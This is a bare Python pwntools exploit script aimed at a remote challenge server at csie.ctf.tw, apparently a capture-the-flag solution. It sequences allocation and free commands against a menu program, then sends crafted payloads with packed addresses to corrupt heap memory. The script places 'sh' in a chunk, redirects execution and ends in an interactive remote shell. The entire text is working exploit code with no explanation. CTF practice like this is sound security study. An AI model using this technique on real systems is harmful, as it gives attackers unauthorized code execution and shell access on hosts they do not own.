from pwn import *
#r = remote("0",8888)
r = remote("csie.ctf.tw",10151)
r.sendline("1 0")
r.sendline("56")
r.sendline("A")
r.sendline("1 1")
r.sendline("56")
r.sendline("A")
r.sendline("2 1")
r.sendline("2 0")
r.sendline("1 0")
r.sendline("56")
r.sendline("A"*56+p64(0x41)+p64(0x402002))
r.sendline("1 3")
r.sendline("56")
r.sendline("sh")
r.sendline("1 4")
r.sendline("56")
r.sendline(p64(0x40)+"A"*14+p64(0x4008c6)[:-2])
r.sendline("3 3")
r.interactive()
